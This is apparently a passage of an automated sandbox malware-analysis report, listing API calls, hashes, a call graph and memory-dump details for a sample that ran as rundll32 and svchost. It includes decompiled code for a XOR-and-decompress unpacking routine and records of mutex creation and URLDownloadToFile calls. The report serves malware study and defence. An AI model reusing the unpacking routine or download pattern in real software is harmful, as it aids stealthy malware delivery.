                                                  • Instruction Fuzzy Hash: 97115FFE9001186BD711DB50ED85FE973BCDB54304F008694FA499F141E675FB988B91
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  APIs
                                                  • _LocaleUpdate::_LocaleUpdate.LIBCMT ref: 00357350
                                                  • __isleadbyte_l.LIBCMT ref: 00357384
                                                  • MultiByteToWideChar.KERNEL32(?,00000009,00000108,?,?,00000000,?,?,?), ref: 003573B5
                                                  • MultiByteToWideChar.KERNEL32(?,00000009,00000108,00000001,?,00000000,?,?,?), ref: 00357423
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.2348568952.000000000034A000.00000020.00020000.sdmp, Offset: 0034A000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_34a000_rundll32.jbxd
                                                  Similarity
                                                  • API ID: ByteCharLocaleMultiWide$UpdateUpdate::___isleadbyte_l
                                                  • String ID:
                                                  • API String ID: 3058430110-0
                                                  • Opcode ID: c07013d78dbb74dd6e9c18c6a27453d308fa59d82f4178a70090cd1aeb49fdba
                                                  • Instruction ID: d4ec3607189f4cb9f0754db52ab3f7fa673f64d3032cf7c75034c331321355f2
                                                  • Opcode Fuzzy Hash: c07013d78dbb74dd6e9c18c6a27453d308fa59d82f4178a70090cd1aeb49fdba
                                                  • Instruction Fuzzy Hash: 9E31D235608255EFDB22DF64D884DAD7BB5BF01322F1685A9EC508B1B1E330DD44EB90
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  APIs
                                                  • std::_String_base::_Xlen.LIBCPMT ref: 0034A882
                                                    • Part of subcall function 0034AD8A: __EH_prolog3.LIBCMT ref: 0034AD91
                                                    • Part of subcall function 0034AD8A: std::runtime_error::runtime_error.LIBCPMT ref: 0034ADAE
                                                    • Part of subcall function 0034AD8A: __CxxThrowException@8.LIBCMT ref: 0034ADC3
                                                  • std::_String_base::_Xlen.LIBCPMT ref: 0034A8A5
                                                  • std::_String_base::_Xlen.LIBCPMT ref: 0034A8BC
                                                  • _memcpy_s.LIBCMT ref: 0034A92F
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.2348568952.000000000034A000.00000020.00020000.sdmp, Offset: 0034A000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_34a000_rundll32.jbxd
                                                  Similarity
                                                  • API ID: String_base::_Xlenstd::_$Exception@8H_prolog3Throw_memcpy_sstd::runtime_error::runtime_error
                                                  • String ID:
                                                  • API String ID: 1039763836-0
                                                  • Opcode ID: e462159f91ebf12371c075a090d43d788f6f1f0694b4add03d2d06dc5b6c9539
                                                  • Instruction ID: 9a6dd0fc5526aad4b41d023145d117d20ededa83c557e5c25657f8a917b68313
                                                  • Opcode Fuzzy Hash: e462159f91ebf12371c075a090d43d788f6f1f0694b4add03d2d06dc5b6c9539
                                                  • Instruction Fuzzy Hash: 9431E232380F098BD722EE5CD98052AB7E5EFA0710B51492EE192CF641E730FD4587A3
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  APIs
                                                    • Part of subcall function 0034EA9B: __getptd_noexit.LIBCMT ref: 0034EA9C
                                                    • Part of subcall function 0034EA9B: __amsg_exit.LIBCMT ref: 0034EAA9
                                                  • __amsg_exit.LIBCMT ref: 0034E3D0
                                                  • __lock.LIBCMT ref: 0034E3E0
                                                  • InterlockedDecrement.KERNEL32(?), ref: 0034E3FD
                                                  • InterlockedIncrement.KERNEL32(0036C980), ref: 0034E428
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.2348568952.000000000034A000.00000020.00020000.sdmp, Offset: 0034A000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_34a000_rundll32.jbxd
                                                  Similarity
                                                  • API ID: Interlocked__amsg_exit$DecrementIncrement__getptd_noexit__lock
                                                  • String ID:
                                                  • API String ID: 2880340415-0
                                                  • Opcode ID: 95f95be24d7f93d605a4ba96fd1a39f2ecb087450f06dd18f2c1e0457a411422
                                                  • Instruction ID: 2cebb276fda5eba3df65a9d790b35ddfe24ad3cfe06abff4fed6e46692b3dc80
                                                  • Opcode Fuzzy Hash: 95f95be24d7f93d605a4ba96fd1a39f2ecb087450f06dd18f2c1e0457a411422
                                                  • Instruction Fuzzy Hash: F901C035D02A21DBCB33AF669849BADB7E0BF00710F069415E810AF691C774BC41CBD1
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  APIs
                                                  • GetModuleHandleA.KERNEL32(0035943C,0036ABD8,0000000C,0034EA76,00000000,00000000,?,?,0034D16F,0034D31B,?,0034BE12,?), ref: 0034E975
                                                  • InterlockedIncrement.KERNEL32(0036C558), ref: 0034E9D0
                                                  • __lock.LIBCMT ref: 0034E9D8
                                                  • ___addlocaleref.LIBCMT ref: 0034E9F7
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.2348568952.000000000034A000.00000020.00020000.sdmp, Offset: 0034A000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_34a000_rundll32.jbxd
                                                  Similarity
                                                  • API ID: HandleIncrementInterlockedModule___addlocaleref__lock
                                                  • String ID:
                                                  • API String ID: 2801583907-0
                                                  • Opcode ID: 211c28deb33e55d5fe2efa5ff81b7d27f5811875094f6dfa0529beaa2267e80f
                                                  • Instruction ID: 7ad94ad85fe82f07d604622b17a7e57de51fa235edf76f8df247588cc4870a43
                                                  • Opcode Fuzzy Hash: 211c28deb33e55d5fe2efa5ff81b7d27f5811875094f6dfa0529beaa2267e80f
                                                  • Instruction Fuzzy Hash: 0711C2B0900701DFDB22EF3AD805B9ABBE0FF04301F00841AE899DB2A1C774A904CF10
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  C-Code - Quality: 100%
                                                  			E00341D40(void* __eflags, intOrPtr _a4, intOrPtr _a8, char _a12) {
                                                  				signed int _v8;
                                                  				void* _v12;
                                                  				long _v16;
                                                  				char _v20;
                                                  				void* _t33;
                                                  				void* _t66;
                                                  				void* _t67;
                                                  
                                                  				_t1 =  &_a12; // 0x34236a
                                                  				_t33 = E00341390( *_t1);
                                                  				_t67 = _t66 + 4;
                                                  				_v12 = _t33;
                                                  				_v8 = 8;
                                                  				while(_v8 < _a8) {
                                                  					 *(_a4 + _v8) =  *(_a4 + _v8) ^  *(_a4 + _v8 % 8);
                                                  					_v8 = _v8 + 1;
                                                  				}
                                                  				_t19 =  &_v20; // 0x34236a
                                                  				_t22 =  &_a12; // 0x34236a
                                                  				_v16 = RtlDecompressBuffer(2, _v12,  *_t22, _a4 + 8, _a8 - 8, _t19);
                                                  				if(_v16 == 0) {
                                                  					_t26 =  &_v20; // 0x34236a
                                                  					E00341450(_a4, _v12,  *_t26);
                                                  					_t67 = _t67 + 0xc;
                                                  				}
                                                  				E003413D0(_v12);
                                                  				if(_v16 != 0) {
                                                  					return 0;
                                                  				}
                                                  				_t31 =  &_v20; // 0x34236a
                                                  				return  *_t31;
                                                   			}


                                                  APIs
                                                    • Part of subcall function 00341390: GetProcessHeap.KERNEL32(?,00341886,00100000), ref: 0034139C
                                                    • Part of subcall function 00341390: RtlAllocateHeap.NTDLL(004E0000,00000000,00341886,?,00341886,00100000), ref: 003413BD
                                                  • RtlDecompressBuffer.NTDLL(00000002,?,j#4,?,004FFFF8,j#4), ref: 00341DB3
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.2348545446.0000000000341000.00000020.00020000.sdmp, Offset: 00340000, based on PE: true
                                                  • Associated: 00000005.00000002.2348540160.0000000000340000.00000002.00020000.sdmp Download File
                                                  • Associated: 00000005.00000002.2348553427.0000000000344000.00000002.00020000.sdmp Download File
                                                  • Associated: 00000005.00000002.2348559404.0000000000345000.00000004.00020000.sdmp Download File
                                                  • Associated: 00000005.00000002.2348564612.0000000000348000.00000002.00020000.sdmp Download File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_340000_rundll32.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: Heap$AllocateBufferDecompressProcess
                                                  • String ID: j#4$j#4
                                                  • API String ID: 2896260840-2453557312
                                                  • Opcode ID: 58f986564c3823682c9c5c20cd8427f55a198f7de81e21b9ecbcfba8b92b393a
                                                  • Instruction ID: 8b572404ecf7dbec48ae8e63a9b8147997b76a483cb6ade8f6efa8f832cfbb9a
                                                  • Opcode Fuzzy Hash: 58f986564c3823682c9c5c20cd8427f55a198f7de81e21b9ecbcfba8b92b393a
                                                  • Instruction Fuzzy Hash: 9D213BB4E04508EFCB05DF98D881ABEBBF9AF89305F148598F9199B241D634BA80CF54
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Execution Graph

                                                  Execution Coverage:16.5%
                                                  Dynamic/Decrypted Code Coverage:0%
                                                  Signature Coverage:60%
                                                  Total number of Nodes:943
                                                  Total number of Limit Nodes:71

                                                  Graph

                                                   execution_graph: call-graph node and edge listing (text source of the rendered graph figure). The graph is rooted at node 4013c9 and its nodes reference the API calls SetUnhandledExceptionFilter, CreateMutexA, URLDownloadToFileA, RtlAllocateHeap and RtlReAllocateHeap; the listing is truncated at the end of the page.
414ff7 2 API calls 17799 40f801 17798->17799 17799->17800 17801 411ce0 2 API calls 17799->17801 17800->17182 17801->17800 17802->17786 17802->17791 17802->17800 17803 40d371 2 API calls 17802->17803 17804 40695e RtlAllocateHeap 17802->17804 17805 4228b7 2 API calls 17802->17805 18001 414f9b 17802->18001 17803->17802 17804->17802 17805->17802 18141 40b793 17806->18141 17809 415021 17811 4227e3 2 API calls 17809->17811 17810 415034 17812 40239a RtlAllocateHeap 17810->17812 17813 41502f 17811->17813 17812->17813 17813->17186 17814 411ce0 17813->17814 17815 40b793 2 API calls 17814->17815 17816 411d11 17815->17816 17824 411d52 17816->17824 18144 40b76a 17816->18144 17820 411d68 17821 4021e8 2 API calls 17820->17821 17822 411d89 17821->17822 17823 4021e8 2 API calls 17822->17823 17822->17824 17823->17824 17824->17186 18150 401d3b 17825->18150 17827 40e7ab 17828 401d3b 2 API calls 17827->17828 17831 40e821 17827->17831 17829 40e7ee 17828->17829 17829->17831 18155 406b17 17829->18155 17831->17194 17833 4029f9 17832->17833 17834 402a0b 17833->17834 17835 422c53 RtlReAllocateHeap 17833->17835 17836 402a04 17835->17836 17837 402be8 17836->17837 17838 402c2d 17837->17838 17839 422c53 RtlReAllocateHeap 17838->17839 17840 402c3f 17838->17840 17841 402c38 17839->17841 17842 40d371 17841->17842 18177 40d3ad 17842->18177 17844 40d38a 17854 42822e 17845->17854 17847 42ce5d 17858 425b31 17847->17858 17849 401d29 17850 42ce79 17849->17850 17851 42ce8c 17850->17851 17852 42cea6 17850->17852 17851->17852 17853 420390 RtlReAllocateHeap 17851->17853 17852->17749 17853->17852 17855 428238 17854->17855 17857 42824b 17855->17857 17861 425b15 17855->17861 17857->17847 17869 425b74 17858->17869 17860 425b4f 17860->17849 17862 425b1f 17861->17862 17864 425b28 17861->17864 17865 42a86d 17862->17865 17864->17857 17866 42a879 17865->17866 17868 42a889 17865->17868 17867 42a887 RtlAllocateHeap 17866->17867 17867->17868 17868->17864 17870 425b8d 17869->17870 17871 425bd6 17869->17871 17870->17871 
17873 4228b7 17870->17873 17871->17860 17874 4228f2 17873->17874 17876 4228c8 17873->17876 17874->17871 17875 422906 17880 42292b 17875->17880 17876->17874 17876->17875 17878 4228e5 17876->17878 17884 420390 17878->17884 17881 422939 17880->17881 17883 42293f 17880->17883 17882 42a86d RtlAllocateHeap 17881->17882 17881->17883 17882->17883 17883->17874 17885 4203a3 17884->17885 17887 4203b4 17884->17887 17886 4203b2 RtlReAllocateHeap 17885->17886 17886->17887 17887->17874 17897 422994 17888->17897 17890 422ae6 17890->17752 17892 42274e 17891->17892 17893 42272c 17891->17893 17904 4227e3 17892->17904 17896 42273e 17893->17896 17901 42281c 17893->17901 17896->17752 17898 42299c 17897->17898 17900 4229aa 17897->17900 17899 42292b RtlAllocateHeap 17898->17899 17899->17900 17900->17890 17907 42282d 17901->17907 17903 42282a 17903->17896 17905 42281c 2 API calls 17904->17905 17906 4227fb 17905->17906 17906->17896 17908 422846 17907->17908 17910 422885 17907->17910 17909 4228b7 2 API calls 17908->17909 17908->17910 17909->17910 17910->17903 17912 428d5f 17911->17912 17914 428dff 17912->17914 17922 428215 17912->17922 17915 428e67 17914->17915 17916 428e3b 17914->17916 17932 4281ed 17915->17932 17925 42676f 17916->17925 17919 428d8e 17919->17914 17921 425b74 2 API calls 17919->17921 17920 428e50 17920->17757 17921->17919 17923 42822e RtlAllocateHeap 17922->17923 17924 428222 17923->17924 17924->17919 17936 422a8d 17925->17936 17929 426798 17944 4267cf 17929->17944 17933 4281fb 17932->17933 17934 428205 17932->17934 17935 425b74 2 API calls 17933->17935 17934->17920 17935->17934 17937 422ad7 RtlAllocateHeap 17936->17937 17938 422aa1 17937->17938 17939 4227e3 2 API calls 17938->17939 17940 422aad 17939->17940 17941 425af4 17940->17941 17942 425b15 RtlAllocateHeap 17941->17942 17943 425b02 17942->17943 17943->17929 17945 425af4 RtlAllocateHeap 17944->17945 17946 4267b5 17945->17946 17946->17920 17948 428d39 2 API calls 17947->17948 17949 429563 17948->17949 17949->17760 17952 
42928e 17950->17952 17951 42281c 2 API calls 17951->17952 17952->17951 17953 4292f2 17952->17953 17953->17763 17955 402b13 17954->17955 17956 402b25 17955->17956 18009 422c53 17955->18009 17958 402b1e 17958->17783 17963 4279bd 17959->17963 17967 4279b5 17959->17967 17960 427b7f 18030 428717 17960->18030 17962 427e4c RtlReAllocateHeap RtlAllocateHeap 17962->17963 17963->17960 17963->17962 17964 427fe3 RtlReAllocateHeap RtlAllocateHeap 17963->17964 17963->17967 18013 427ff3 17963->18013 18018 428076 17963->18018 18021 428047 17963->18021 18025 428035 17963->18025 17964->17963 17965 428035 2 API calls 17968 427b89 17965->17968 17966 427ff3 2 API calls 17966->17968 17967->17783 17968->17965 17968->17966 17968->17967 17971 428047 2 API calls 17968->17971 17972 428076 2 API calls 17968->17972 17971->17968 17972->17968 18115 4272f2 17975->18115 17978 4227e3 2 API calls 17979 427c67 17978->17979 18118 427c93 17979->18118 17981 427c72 17981->17783 17983 422994 RtlAllocateHeap 17982->17983 17984 406952 17983->17984 17984->17780 18126 406c30 17985->18126 18134 406bed 17988->18134 17990 40696c 17990->17789 17993 402202 17991->17993 17992 402282 17992->17800 17995 422c41 17992->17995 17993->17992 17994 42676f 2 API calls 17993->17994 17994->17992 17996 422a8d 2 API calls 17995->17996 17997 40f7e6 17996->17997 17997->17798 17999 40695e RtlAllocateHeap 17998->17999 18000 4023af 17999->18000 18000->17800 18138 40b633 18001->18138 18004 414fb7 18006 40239a RtlAllocateHeap 18004->18006 18005 414fd8 18007 40695e RtlAllocateHeap 18005->18007 18008 414fc9 18006->18008 18007->18008 18008->17802 18010 422c78 18009->18010 18011 422c62 18009->18011 18010->17958 18011->18010 18012 420390 RtlReAllocateHeap 18011->18012 18012->18010 18046 4284b4 18013->18046 18015 428003 18054 428351 18015->18054 18019 42809a 2 API calls 18018->18019 18020 428088 18019->18020 18020->17963 18022 42805b 18021->18022 18023 428054 18021->18023 18024 428351 2 API calls 18023->18024 18024->18022 18026 428045 
18025->18026 18027 42803f 18025->18027 18026->17963 18028 4282ad 2 API calls 18027->18028 18029 428651 18028->18029 18029->17963 18031 42886a 18030->18031 18032 42872f 18030->18032 18031->17968 18032->18031 18033 425af4 RtlAllocateHeap 18032->18033 18034 428762 18033->18034 18035 4284b4 2 API calls 18034->18035 18036 42876e 18035->18036 18037 4287d2 18036->18037 18038 428779 18036->18038 18113 428264 18037->18113 18040 425af4 RtlAllocateHeap 18038->18040 18043 428788 18038->18043 18040->18043 18041 428264 2 API calls 18042 4287dc 18041->18042 18042->17968 18043->18031 18044 4228b7 2 API calls 18043->18044 18045 42882d 18043->18045 18044->18045 18045->18031 18045->18041 18058 4282ad 18046->18058 18049 4284c4 18052 428076 2 API calls 18049->18052 18053 4284e3 18049->18053 18050 4284ea 18062 4282e7 18050->18062 18052->18053 18053->18015 18055 428361 18054->18055 18056 428008 18054->18056 18083 42836a 18055->18083 18056->17963 18059 4282cf 18058->18059 18060 4282bb 18058->18060 18059->18049 18059->18050 18060->18059 18066 42809a 18060->18066 18063 4282f4 18062->18063 18065 428301 18062->18065 18064 425af4 RtlAllocateHeap 18063->18064 18064->18065 18065->18053 18077 42812d 18066->18077 18069 4281ed 2 API calls 18070 4280d0 18069->18070 18071 427c3d 2 API calls 18070->18071 18072 4280dd 18071->18072 18073 4280e3 18072->18073 18074 428215 RtlAllocateHeap 18072->18074 18073->18059 18075 428165 18074->18075 18075->18073 18076 425b74 2 API calls 18075->18076 18076->18075 18078 428141 18077->18078 18079 428215 RtlAllocateHeap 18078->18079 18081 4280c9 18078->18081 18080 428165 18079->18080 18080->18081 18082 425b74 2 API calls 18080->18082 18081->18069 18082->18080 18086 428385 18083->18086 18085 428372 18085->18056 18095 4283ed 18086->18095 18088 428393 18089 4283d7 18088->18089 18090 4283ed 2 API calls 18088->18090 18089->18085 18091 4283a9 18090->18091 18091->18089 18092 425af4 RtlAllocateHeap 18091->18092 18093 4283bf 18092->18093 18098 4283fd 18093->18098 18101 428412 
18095->18101 18097 4283f5 18097->18088 18099 428412 2 API calls 18098->18099 18100 428408 18099->18100 18100->18089 18102 428480 18101->18102 18103 428421 18101->18103 18102->18097 18104 4284b4 RtlReAllocateHeap RtlAllocateHeap 18103->18104 18107 42842d 18104->18107 18105 428476 18106 428264 RtlReAllocateHeap RtlAllocateHeap 18105->18106 18106->18102 18107->18105 18108 42848a 18107->18108 18109 428451 18107->18109 18111 425af4 RtlAllocateHeap 18107->18111 18110 428512 RtlReAllocateHeap RtlAllocateHeap 18108->18110 18109->18105 18109->18108 18112 4284b2 18110->18112 18111->18109 18114 4282ad 2 API calls 18113->18114 18116 422994 RtlAllocateHeap 18115->18116 18117 427301 18116->18117 18117->17978 18119 427cac 18118->18119 18120 427d16 18119->18120 18123 427cb1 18119->18123 18125 4228b7 2 API calls 18119->18125 18121 42281c 2 API calls 18120->18121 18120->18123 18124 427d3c 18120->18124 18121->18124 18122 422c53 RtlReAllocateHeap 18122->18123 18123->17981 18124->18122 18125->18120 18127 406c4b 18126->18127 18129 406c56 18127->18129 18130 4022e8 18127->18130 18129->17784 18129->17802 18131 4022fb 18130->18131 18133 40230a 18130->18133 18132 42676f 2 API calls 18131->18132 18132->18133 18133->18129 18135 406c00 18134->18135 18136 406bf7 18134->18136 18135->17990 18137 42a86d RtlAllocateHeap 18136->18137 18137->18135 18139 406c30 2 API calls 18138->18139 18140 40b655 18139->18140 18140->18004 18140->18005 18142 4227e3 2 API calls 18141->18142 18143 40b7b3 18142->18143 18143->17809 18143->17810 18145 4227e3 2 API calls 18144->18145 18146 40b788 18145->18146 18146->17824 18147 406619 18146->18147 18148 42281c 2 API calls 18147->18148 18149 406633 18148->18149 18149->17820 18151 42812d 2 API calls 18150->18151 18152 401d64 18151->18152 18154 401d92 18152->18154 18158 42d0aa 18152->18158 18154->17827 18171 42cefd 18155->18171 18159 42d0c3 18158->18159 18160 42d0d6 18159->18160 18164 42d0f2 18159->18164 18168 42d043 18160->18168 18165 42d100 18164->18165 18166 42d10a 
18164->18166 18167 425b74 2 API calls 18165->18167 18166->18160 18167->18166 18169 42ce79 RtlReAllocateHeap 18168->18169 18170 42d061 18169->18170 18170->18154 18172 42281c 2 API calls 18171->18172 18174 42cf37 18172->18174 18173 406b38 18173->17831 18174->18173 18175 42281c 2 API calls 18174->18175 18176 4227e3 2 API calls 18174->18176 18175->18174 18176->18174 18178 40d3e9 18177->18178 18179 40d402 18178->18179 18181 40d727 18178->18181 18182 4228b7 2 API calls 18178->18182 18180 422c41 2 API calls 18179->18180 18187 40d4e5 18180->18187 18181->17844 18182->18178 18183 428d39 2 API calls 18183->18187 18184 425b74 2 API calls 18184->18187 18187->18181 18187->18183 18187->18184 18188 426a00 18187->18188 18193 40613b 18187->18193 18189 4272f2 RtlAllocateHeap 18188->18189 18192 426a1d 18189->18192 18190 426a5a 18190->18187 18192->18190 18199 42730d 18192->18199 18198 406174 18193->18198 18194 4061ce 18195 4227e3 2 API calls 18194->18195 18197 4061e3 18195->18197 18196 4227e3 RtlReAllocateHeap RtlAllocateHeap 18196->18198 18197->18187 18198->18194 18198->18196 18200 427324 18199->18200 18201 4227e3 2 API calls 18200->18201 18202 427332 18201->18202 18202->18192

                                                  Executed Functions

                                                  APIs
                                                  • CreateMutexA.KERNELBASE(00000000,00000001,?), ref: 004158C6
                                                  • URLDownloadToFileA.URLMON(00000000,?,?,00000000,00000000), ref: 00415C3C
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000007.00000002.2133065306.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_7_2_400000_svchost.jbxd
                                                  Similarity
                                                  • API ID: CreateDownloadFileMutex
                                                  • String ID: wC$$zC$$}C$$~C$,wC$,}C$0~C$8wC$<vC$<vC$@$@pC$@pC$@pC$@pC$@pC$@pC$@pC$@pC$DyC$LvC$TqC$TyC$XvC$\xC$\xC$\xC$\}C$dvC$d}C$p@D$xqC
                                                  • API String ID: 2836258396-1495465107
                                                  • Opcode ID: eb156ac7ec4e0aefba1d104138bdfd6374e412e2dcfc7611adf2ae9eab0656e9
                                                  • Instruction ID: 3eab1be84b858212c2b712eb9ecab3bf2646d5897512f5f08c00c1dba6ecace8
                                                  • Opcode Fuzzy Hash: eb156ac7ec4e0aefba1d104138bdfd6374e412e2dcfc7611adf2ae9eab0656e9
                                                  • Instruction Fuzzy Hash: 6E244C716087818BD335DF24C891BDBB7E5FFC9304F10492EE48A9B291DB78A945CB86
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Control-flow Graph
                                                  APIs
                                                  • SetUnhandledExceptionFilter.KERNEL32 ref: 00401223
                                                  Memory Dump Source
                                                  • Source File: 00000007.00000002.2133065306.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_7_2_400000_svchost.jbxd
                                                  Similarity
                                                  • API ID: ExceptionFilterUnhandled
                                                  • String ID:
                                                  • API String ID: 3192549508-0
                                                  • Opcode ID: 854dcdc4280b8f2bbf386967df07d2ab6d598209781f5a3c52be75b235f8de86
                                                  • Instruction ID: 6637b0886fb05ed50bbf3230547d5b9ae6dc46fa2eb97121aa624c758af38a7b
                                                  • Opcode Fuzzy Hash: 854dcdc4280b8f2bbf386967df07d2ab6d598209781f5a3c52be75b235f8de86
                                                  • Instruction Fuzzy Hash: 2671B075A043008FDB14DFA5E88179A77F0FB89704F51843EE944AB3A1D77DA844CB9A
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Control-flow Graph
                                                  APIs
                                                  • SetUnhandledExceptionFilter.KERNEL32 ref: 00401223
                                                  Memory Dump Source
                                                  • Source File: 00000007.00000002.2133065306.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_7_2_400000_svchost.jbxd
                                                  Similarity
                                                  • API ID: ExceptionFilterUnhandled
                                                  • String ID:
                                                  • API String ID: 3192549508-0
                                                  • Opcode ID: dcd53c9b16003cf5b3d6ef81286d83416c97c5c6dd39a0a7c2031c902ce980c7
                                                  • Instruction ID: 5797e43cdd90b994771c2fa4facc44f94b85f60fc6e77d04d8847e05aa05cae2
                                                  • Opcode Fuzzy Hash: dcd53c9b16003cf5b3d6ef81286d83416c97c5c6dd39a0a7c2031c902ce980c7
                                                  • Instruction Fuzzy Hash: A851AE79A007008FDB14DFA9E88175AB7F0FB89708F11853EE944AB361D738A854CF99
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Control-flow Graph
                                                  APIs
                                                  • SetUnhandledExceptionFilter.KERNEL32 ref: 00401223
                                                  Memory Dump Source
                                                  • Source File: 00000007.00000002.2133065306.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_7_2_400000_svchost.jbxd
                                                  Similarity
                                                  • API ID: ExceptionFilterUnhandled
                                                  • String ID:
                                                  • API String ID: 3192549508-0
                                                  • Opcode ID: 876e0ef929dbb53e3562dd275479b8dbad9e4b4d1d75118838730e5b23ac798c
                                                  • Instruction ID: 987660f846687a77f09716a2d97ca067eee8a792d56564ae2e65df0ec55cb76e
                                                  • Opcode Fuzzy Hash: 876e0ef929dbb53e3562dd275479b8dbad9e4b4d1d75118838730e5b23ac798c
                                                  • Instruction Fuzzy Hash: EE413AB9A047008FDB14EFA5E88179AB7F0FB89308F11843ED98497361D778A854CF5A
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Memory Dump Source
                                                  • Source File: 00000007.00000002.2133065306.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_7_2_400000_svchost.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: c5d87a72ccccfd3a772a0014e3e51dacc10e76357f72305bb139c42e3191fa53
                                                  • Instruction ID: f32114367b7a43fce08da7f4bf6eed9adcee18824e378ae50fddce3faf8ac97f
                                                  • Opcode Fuzzy Hash: c5d87a72ccccfd3a772a0014e3e51dacc10e76357f72305bb139c42e3191fa53
                                                  • Instruction Fuzzy Hash: 7C4124B06087009FD324DF1AD881B5AFBF5FFC8314F10892EE98A83750D779A8458B5A
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Non-executed Functions